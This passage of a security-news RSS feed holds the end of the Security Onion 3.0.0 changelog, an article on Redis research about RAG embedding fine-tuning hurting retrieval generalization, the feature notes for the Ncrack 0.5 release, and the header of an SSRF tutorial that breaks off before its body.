<li>Add SOC UI toggle for JA4+ fingerprinting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4088617885" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15624" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15624/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15624">#15624</a></li>
<li>old code cleanup. add ja4 toggle in soc. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090010135" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15627" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15627/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15627">#15627</a></li>
<li>Add salt states for custom Zeek package loading by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090013122" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15628" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15628/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15628">#15628</a></li>
<li>Add customizable ulimit settings for all Docker containers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090616513" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15629" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15629/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15629">#15629</a></li>
<li>use elasticsearch recommended vm.max_map_count by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090939515" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15630" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15630/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15630">#15630</a></li>
<li>update helpLink references for new documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dougburks/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dougburks">@dougburks</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095285496" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15634" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15634/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15634">#15634</a></li>
<li>Customulimit by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095598966" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15636" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15636/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15636">#15636</a></li>
<li>remove .jinja from daemon.json by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095810682" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15638" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15638/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15638">#15638</a></li>
<li>ignore redis restart warning in logstash log by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095744276" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15637" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15637/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15637">#15637</a></li>
<li>fix global override settings affecting non-data stream indices by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091397055" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15632" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15632/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15632">#15632</a></li>
<li>ensure valid ulimit names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4096445689" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15640" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15640/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15640">#15640</a></li>
<li>more doc updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4096530704" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15642" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15642/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15642">#15642</a></li>
<li>fix so-idh and so-redis datastream config by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4097293400" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15644" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15644/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15644">#15644</a></li>
<li>fix casing to match annotation docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4097292706" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15643" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15643/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15643">#15643</a></li>
<li>Support docker ulimit customization by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4096505272" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15641" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15641/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15641">#15641</a></li>
<li>Hyperlink to JA4+ license by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102374837" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15648" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15648/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15648">#15648</a></li>
<li>Enabled / Disabled Buttons for SOC Grid Configuration  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107764345" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15652" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15652/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15652">#15652</a></li>
<li>add yes/no to true/false conversion for suricata to soup postupgrade by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4109915609" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15653" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15653/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15653">#15653</a></li>
<li>Add support for websockets by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4120296071" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15656" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15656/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15656">#15656</a></li>
<li>do not attempt to redirect to a source map after login by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4121042105" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15658" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15658/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15658">#15658</a></li>
<li>exclude oscap profile from gitleaks by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123154533" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15662" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15662/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15662">#15662</a></li>
<li>Remove hardcoded path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123523719" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15663" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15663/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15663">#15663</a></li>
<li>allow negation in suricata address-group vars by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123835127" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15665" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15665/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15665">#15665</a></li>
<li>update stig profile v1r3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123110285" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15661" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15661/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15661">#15661</a></li>
<li>Enable clean option for Zeek configuration by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4128121169" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15667" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15667/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15667">#15667</a></li>
<li>Lowercase network transport by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4128744156" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15669" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15669/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15669">#15669</a></li>
<li>update yara template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4130312628" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15672" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15672/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15672">#15672</a></li>
<li>Make AI adapter settings visible by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144033622" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15676" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15676/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15676">#15676</a></li>
<li>ensure bool sliders soc by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4155244645" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15690" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15690/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15690">#15690</a></li>
<li>revisit workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4155665849" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15691" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15691/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15691">#15691</a></li>
<li>Remove hardcoded index by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defensivedepth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defensivedepth">@defensivedepth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4172302645" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15694" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15694/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15694">#15694</a></li>
<li>3.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4179146246" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15695" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15695/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15695">#15695</a></li>
<li>Merge 3/main into 3/dev by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4179378659" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15698" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15698/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15698">#15698</a></li>
<li>3.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4179266631" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15696" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15696/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15696">#15696</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/Security-Onion-Solutions/securityonion/compare/2.4.201-20260114...3.0.0-20260331"><tt>2.4.201-20260114...3.0.0-20260331</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[RAG precision tuning can quietly cut retrieval accuracy by 40%, putting agentic pipelines at risk]]></title>
<description><![CDATA[Enterprise teams that fine-tune their RAG embedding models for better precision may be unintentionally degrading the retrieval quality those pipelines depend on, according to new research from Redis.The paper, "Training for Compositional Sensitivity Reduces Dense Retrieval Generalization," tested...]]></description>
<link>https://tsecurity.de/de/3468383/it-nachrichten/rag-precision-tuning-can-quietly-cut-retrieval-accuracy-by-40-putting-agentic-pipelines-at-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3468383/it-nachrichten/rag-precision-tuning-can-quietly-cut-retrieval-accuracy-by-40-putting-agentic-pipelines-at-risk/</guid>
<pubDate>Mon, 27 Apr 2026 16:02:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprise teams that fine-tune their RAG embedding models for better precision may be unintentionally degrading the retrieval quality those pipelines depend on, according to new research from Redis.</p><p>The paper, "Training for Compositional Sensitivity Reduces Dense Retrieval Generalization," tested what happens when teams train embedding models for compositional sensitivity. That is the ability to catch sentences that look nearly identical but mean something different — "the dog bit the man" versus "the man bit the dog," or a negation flip that reverses a statement's meaning entirely. That training consistently broke dense retrieval generalization, how well a model retrieves correctly across broad topics and domains it wasn't specifically trained on. Performance dropped by 8 to 9 percent on smaller models and by 40 percent on a current mid-size embedding model teams are actively using in production.

The findings have direct implications for enterprise teams building agentic AI pipelines, where retrieval quality determines what context flows into an agent's reasoning chain. A retrieval error in a single-stage pipeline returns a wrong answer. The same error in an agentic pipeline can trigger a cascade of wrong actions downstream.</p><p>Srijith Rajamohan, AI Research Leader at Redis and one of the paper's authors, said the finding challenges a widespread assumption about how embedding-based retrieval actually works. </p><p>"There's this general notion that when you use semantic search or similar semantic similarity, we get correct intent. That's not necessarily true," Rajamohan told VentureBeat<i>.</i> "A close or high semantic similarity does not actually mean an exact intent."</p><h2>The geometry behind the retrieval tradeoff</h2><p>Embedding models work by compressing an entire sentence into a single point in a high-dimensional space, then finding the closest points to a query at retrieval time. That works well for broad topical matching — documents about similar subjects end up near each other. The problem is that two sentences with nearly identical words but opposite meanings also end up near each other, because the model is working from word content rather than structure.</p><p>That is what the research quantified. When teams fine-tune an embedding model to push structurally different sentences apart — teaching it that a negation flip which reverses a statement's meaning is not the same as the original — the model uses representational space it was previously using for broad topical recall. The two objectives compete for the same vector. 

The research also found the regression is not uniform across failure types. Negation and spatial flip errors improved measurably with structured training. Binding errors — where a model confuses which modifier applies to which word, such as which party a contract obligation falls on — barely moved. For enterprise teams, that means the precision problem is harder to fix in exactly the cases where getting it wrong has the most consequences.</p><p>The reason most teams don't catch it is that fine-tuning metrics measure the task being trained for, not what happens to general retrieval across unrelated topics. A model can show strong improvement on near-miss rejection during training while quietly regressing on the broader retrieval job it was hired to do. The regression only surfaces in production.</p><p>Rajamohan said the instinct most teams reach for — moving to a larger embedding model — does not address the underlying architecture. 

"You can't scale your way out of this," he said. "It's not a problem you can solve with more dimensions and more parameters."</p><h2>Why the standard alternatives all fall short</h2><p>The natural instinct when retrieval precision fails is to layer on additional approaches. The research tested several of them and found each fails in a different way.</p><p><b>Hybrid search.</b> Combining embedding-based retrieval with keyword search is already standard practice for closing precision gaps. But Rajamohan said keyword search cannot catch the failure mode this research identifies, because the problem is not missing words — it is misread structure.

 "If you have a sentence like 'Rome is closer than Paris' and another that says 'Paris is closer than Rome,' and you do an embedding retrieval followed by a text search, you're not going to be able to tell the difference," he said. "The same words exist in both sentences."</p><p><b>MaxSim reranking</b>. Some teams add a second scoring layer that compares individual query words against individual document words rather than relying on the single compressed vector. This approach, known as MaxSim or late interaction and used in systems like ColBERT, did improve relevance benchmark scores in the research. But it completely failed to reject structural near-misses, assigning them near-identity similarity scores. </p><p>The problem is that relevance and identity are different objectives. MaxSim is optimized for the former and blind to the latter. A team that adds MaxSim and sees benchmark improvement may be solving a different problem than the one they have.</p><p><b>Cross-encoders.</b> These work by feeding the query and candidate document into the model simultaneously, letting it compare every word against every word before making a decision. That full comparison is what makes them accurate — and what makes them too expensive to run at production scale. Rajamohan said his team investigated them. They work in the lab and break under real query volumes.</p><p><b>Contextual memory.</b> Also sometimes referred to as agentic memory, these systems are increasingly cited as the path beyond RAG, but Rajamohan said moving to that type of  architecture does not eliminate the structural retrieval problem. Those systems still depend on retrieval at query time, which means the same failure modes apply. The main difference is looser latency requirements, not a precision fix.</p><h2>The two-stage fix the research validated</h2><p>The common thread across every failed approach is the same: a single scoring mechanism trying to handle both recall and precision at once. The research validated a different architecture: stop trying to do both jobs with one vector, and assign each job to a dedicated stage.</p><p><b>Stage one: recall.</b> The first stage works exactly as standard dense retrieval does today — the embedding model compresses documents into vectors and retrieves the closest matches to a query. Nothing changes here. The goal is to cast a wide net and bring back a set of strong candidates quickly. Speed and breadth are what matter at this stage, not perfect precision.</p><p><b>Stage two: precision.</b> The second stage is where the fix lives. Rather than scoring candidates with a single similarity number, a small learned Transformer model examines the query and each candidate at the token level — comparing individual words against individual words to detect structural mismatches like negation flips or role reversals. This is the verification step the single-vector approach cannot perform.</p><p><b>The results.</b> Under end-to-end training, the Transformer verifier outperformed every other approach the research tested on structural near-miss rejection. It was the only approach that reliably caught the failure modes the single-vector system missed.</p><p><b>The tradeoff.</b> Adding a verification stage costs latency. The latency cost depends on how much verification a team runs. For precision-sensitive workloads like legal or accounting applications, full verification at every query is warranted. For general-purpose search, lighter verification may be sufficient. </p><p>The research grew out of a real production problem. Enterprise customers running semantic caching systems were getting fast but semantically incorrect responses back — the retrieval system was treating similar-sounding queries as identical even when their meaning differed. The two-stage architecture is Redis's proposed fix, with incorporation into its LangCache product on the roadmap but not yet available to customers.</p><h2>What this means for enterprise teams</h2><p>The research does not require enterprise teams to rebuild their retrieval pipelines from scratch. But it does ask them to pressure-test assumptions most teams have never examined — about what their embedding models are actually doing, which metrics are worth trusting and where the real precision gaps live in production.</p><p><b>Recognize the tradeoff before tuning around it.</b> Rajamohan said the first practical step is understanding the regression exists. He evaluates any LLM-based retrieval system on three criteria: correctness, completeness and usefulness. Correctness failures cascade directly into the other two, which means a retrieval system that scores well on relevance benchmarks but fails on structural near-misses is producing a false sense of production readiness.</p><p><b>RAG is not obsolete — but know what it can't do.</b> Rajamohan pushed back firmly on claims that RAG has been superseded. "That's a massive oversimplification," he said. "RAG is a very simple pipeline that can be productionized by almost anyone with very little lift." The research does not argue against RAG as an architecture. It argues against assuming a single-stage RAG pipeline with a fine-tuned embedding model is production-ready for precision-sensitive workloads.</p><p><b>The fix is real but not free.</b> For teams that do need higher precision, Rajamohan said the two-stage architecture is not a prohibitive implementation lift, but adding a verification stage costs latency. "It's a mitigation problem," he said. "Not something we can actually solve."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Version 0.5.0 - Ncrack revived]]></title>
<description><![CDATA[Ncrack revived version 0.5:
o Added 4 new modules: Redis, PostgreSQL, MySQL, SIP. Thanks to edeirme for
implementing the Redis, PostgreSQL and MySQL modules.
o Improved HTTP module by adding digest authentication.
o Added --pairwise option for special username/password iteration.
o Added --proxy ...]]></description>
<link>https://tsecurity.de/de/3461110/downloads/version-050-ncrack-revived/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3461110/downloads/version-050-ncrack-revived/</guid>
<pubDate>Fri, 24 Apr 2026 12:47:54 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ncrack revived version 0.5:</p>
<p>o Added 4 new modules: Redis, PostgreSQL, MySQL, SIP. Thanks to edeirme for<br>
implementing the Redis, PostgreSQL and MySQL modules.</p>
<p>o Improved HTTP module by adding digest authentication.</p>
<p>o Added --pairwise option for special username/password iteration.</p>
<p>o Added --proxy option and proxy support implementation. Many thanks<br>
to Andrew Farabee (<a href="https://github.com/andrewfarabee/">https://github.com/andrewfarabee/</a>) for implementing<br>
it.</p>
<p>o Updated the Ncrack openssh library, now based on the OpenSSH 7.1<br>
codebase and updated the SSH module to support all the latest ciphers.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SSRF Server-Side Request Forgery: Server Ko Apna Agent Banao, Internal Network Explore Karo!]]></title>
<description><![CDATA[SSRF Server-Side Request Forgery: Server Ko Apna Agent Banao, Internal Network Explore Karo! (Hinglish Mein)Series: Bug Bounty Zero se Hero 🦸 | Article #17By HackerMD | 19 min readAaj Kya Seekhenge?SSRF kya hai bilkul basics seBasic vs Blind SSRF dono typesCloud metadata attacks AWS, GCP, AzureSS...]]></description>
<link>https://tsecurity.de/de/3450588/hacking/ssrf-server-side-request-forgery-server-ko-apna-agent-banao-internal-network-explore-karo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3450588/hacking/ssrf-server-side-request-forgery-server-ko-apna-agent-banao-internal-network-explore-karo/</guid>
<pubDate>Tue, 21 Apr 2026 09:22:34 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
